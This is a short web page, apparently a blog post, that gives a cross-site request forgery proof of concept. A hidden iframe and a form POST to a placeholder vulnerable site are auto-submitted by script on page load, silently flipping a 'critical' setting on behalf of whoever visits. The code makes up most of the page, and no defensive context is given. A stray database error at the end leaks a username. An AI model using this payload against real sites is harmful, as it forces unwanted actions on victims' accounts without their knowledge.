Example of silently submitting a POST FORM (CSRF)

by

One solution would be to open the form’s action in a frame like an iframe:

<iframe style="display:none" name="csrf-frame"></iframe>
<form method='POST' action='http://vulnerablesite.com/form.php' target="csrf-frame" id="csrf-form">
  <input type="hidden" name="criticaltoggle" value="true">
  <input type="submit" value="submit">
</form>
<script>document.getElementById("csrf-form").submit()</script>

Leave a Comment

Hata!: SQLSTATE[HY000] [1045] Access denied for user 'divattrend_liink'@'localhost' (using password: YES)